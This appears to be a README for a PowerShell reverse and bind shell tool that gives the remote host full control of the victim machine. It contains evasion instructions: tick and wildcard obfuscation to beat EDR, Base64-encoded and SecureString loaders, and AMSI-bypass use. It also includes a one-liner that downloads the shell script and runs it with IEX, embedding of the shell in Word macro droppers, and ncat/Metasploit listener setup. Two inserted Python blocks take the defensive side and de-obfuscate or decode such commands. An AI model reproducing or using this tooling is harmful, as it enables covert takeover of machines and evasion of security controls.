simplepower-reverseshell's Introduction

PowerShell Reverse TCP

PowerShell scripts for communicating with a remote host.

The remote host will have full control over the client and all the underlying system commands.

Check shells based on:

  • Invoke-Expression PowerShell command here,
  • process pipes here.

Tested with PowerShell v5.1.19041.1645 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.

Future plans:

  • more shells based on process pipes, and optimize them further.

How to Run

Change the IP address and port number inside the scripts as necessary.

Open PowerShell from \src\invoke_expression\original\ or \src\process_pipes\original\ and run the commands shown below.

Set the execution policy:

Set-ExecutionPolicy Unrestricted

Run the script:

.\powershell_reverse_tcp.ps1

Or, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

Obfuscate PowerShell Scripts

Try to bypass EDR and other security mechanisms by obfuscating your scripts. You can see such obfuscations in the examples below.

Original PowerShell command:

(New-Object Net.WebClient).DownloadFile($url, $out)

Obfuscated PowerShell command:

& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'

Check the original PowerShell script here and the fully obfuscated one here.

After manual obfuscation, the original PowerShell script was obfuscated with Invoke-Obfuscation. Credits to the author!

Search the Internet for additional obfuscation techniques and methods.

P.S. Because PowerShell is constantly being updated, some wildcard expressions (e.g. *ke-E*) may start to throw exceptions when more than one command matches the same expression, so the expressions will need to be made more specific.
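Seen from the detection side, the tick and wildcard obfuscation shown above can be undone before signature matching. The following is an added example, not code from this repository: the function names and the small command catalogue are assumptions made for illustration, and the sample input is the obfuscated command quoted above.

```python
import fnmatch
import re

# A backtick before one of these characters is a real escape sequence
# (`n newline, `t tab, ...); before any other character it is dropped by
# the parser, which is what tick obfuscation relies on. Case matters.
REAL_ESCAPES = "0abefnrtuv"
TICK = re.compile(r"`([^" + REAL_ESCAPES + r"])")

# A Get-Command call with a wildcard argument, e.g. (gcm *ke-E*).
GCM_CALL = re.compile(
    r"\(\s*(?:gcm|Get-Command)\s+([^\s()]*[*?][^\s()]*)\s*\)", re.I
)

# Small constructed catalogue of real cmdlet names. A production tool would
# load the full command list of the PowerShell version being monitored.
KNOWN_COMMANDS = ["Invoke-Expression", "Invoke-Command", "New-Object",
                  "New-Item", "Get-Command", "Get-Content"]

# The obfuscated command quoted in the section above.
PAGE_SAMPLE = r"""& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'"""


def strip_ticks(text):
    """Remove backticks that do not form a real escape sequence."""
    return TICK.sub(r"\1", text)


def resolve_wildcard(pattern, catalogue=KNOWN_COMMANDS):
    """Return the catalogue entries the wildcard matches (case-insensitive)."""
    return [c for c in catalogue
            if fnmatch.fnmatchcase(c.lower(), pattern.lower())]


def normalize(command):
    """Strip ticks, then replace each unambiguous (gcm <wildcard>) by name.

    Returns the normalized text and a list of (pattern, matches) pairs for
    wildcards that matched zero or several commands and were left in place.
    """
    ambiguous = []

    def substitute(match):
        hits = resolve_wildcard(match.group(1))
        if len(hits) == 1:
            return hits[0]
        ambiguous.append((match.group(1), hits))
        return match.group(0)

    return GCM_CALL.sub(substitute, strip_ticks(command)), ambiguous


if __name__ == "__main__":
    text, unresolved = normalize(PAGE_SAMPLE)
    print(text)
    print(unresolved)
    # A wildcard that several commands match is reported, not guessed.
    print(normalize("& (gcm *ke-*) $x"))
```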

PowerShell Encoded Command

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))
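Because the encoding is only Base64 over UTF-16LE, process command lines that carry an encoded command can be decoded and triaged offline. The following is an added example, not code from this repository: the indicator patterns and function names are assumptions chosen for illustration, and the command lines are constructed samples (192.0.2.10 is a documentation address).

```python
import base64
import binascii
import re

# Illustrative patterns (an assumption of this example), named after the
# techniques this README mentions: TCP sockets, Invoke-Expression, pipes.
INDICATORS = {
    "tcp-client": re.compile(r"Net\.Sockets\.TcpClient", re.I),
    "tcp-listener": re.compile(r"Net\.Sockets\.TcpListener", re.I),
    "invoke-expression": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I),
    "redirected-process": re.compile(r"RedirectStandard(?:Input|Output|Error)", re.I),
    "web-download": re.compile(r"Net\.Web(?:Client|Request)", re.I),
}


def find_encoded_argument(command_line):
    """Return the value that follows -EncodedCommand, or None.

    PowerShell accepts any prefix of the parameter name (-e, -en, -enc, ...),
    the alias -ec, and '/' in place of '-', so an exact-string match misses.
    """
    tokens = command_line.split()
    for i, token in enumerate(tokens[:-1]):
        name = token[1:].lower()
        if token[0] in "-/" and name and (
            "encodedcommand".startswith(name) or name == "ec"
        ):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded_command(value):
    """Reverse ToBase64String(Unicode.GetBytes(script)): Base64, then UTF-16LE."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not a valid encoded command: {exc}") from exc


def triage(command_line):
    """Decode one process command line; return script text and indicator hits."""
    value = find_encoded_argument(command_line)
    if value is None:
        return None
    try:
        script = decode_encoded_command(value)
    except ValueError:
        return {"script": None, "hits": ["undecodable-payload"]}
    hits = sorted(k for k, rx in INDICATORS.items() if rx.search(script))
    return {"script": script, "hits": hits}


def encode_sample(script):
    # Builds sample input the same way the README's encoding command does.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines for the demo (not captured from a real host).
SAMPLES = [
    "powershell.exe -NoProfile -enc " + encode_sample("Get-Date"),
    "PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand "
    + encode_sample("$c = New-Object Net.Sockets.TcpClient('192.0.2.10', 9000); IEX $d"),
    "powershell.exe -File .\\report.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```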

Use the one-liners below if you don't want to leave any artifacts behind.


[Reverse TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'127.0.0.1', '9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand <Base64-encoded script>

The encoded script will prompt for input. See the slightly altered script here; the minified script was used to reduce the command length.

[Reverse TCP - Process Pipes] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'127.0.0.1', '9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand <Base64-encoded script>

The encoded script will prompt for input. See the slightly altered script here; the minified script was used to reduce the command length.


[Bind TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand <Base64-encoded script>

The encoded script will prompt for input. See the slightly altered script here; the minified script was used to reduce the command length.

SecureString

To generate a PowerShell SecureString from a PowerShell script, run the following PowerShell command (the string can get very long):

ConvertFrom-SecureString -k (0..15) (ConvertTo-SecureString (Get-Content -Path $script -Raw) -AsPlainText -Force)

To decode and run a PowerShell SecureString, run the following PowerShell command:

IEX((New-Object System.Net.NetworkCredential("", (ConvertTo-SecureString -k (0..15) $string))).Password)

Most security products will flag a PowerShell script as malicious if the script uses the & symbol excessively.

Check the manually obfuscated and transformed reverse shell script here.

Check the manually obfuscated and transformed bind shell script here.

AMSI Bypass

If Windows Defender is blocking your PowerShell script or encoded command execution, generate an AMSI bypass code from AMSI.fail and run it in your PowerShell session. Credits to the author!

After running the AMSI bypass code, you can download the content of your PowerShell script from the web using this one-liner:

IEX([System.IO.StreamReader]::New([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1').GetResponse().GetResponseStream()).ReadToEnd());

Find out more about AMSI bypass at S3cur3Th1sSh1t/Amsi-Bypass-Powershell. Credits to the author!

MS Word Integration

To embed a PowerShell script into an MS Word document, check the macro_pack tool. Credits to the author!

Run the following command from either PowerShell or Command Prompt:

echo "https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Images

Figure 1 - Backdoor

Figure 2 - Listener
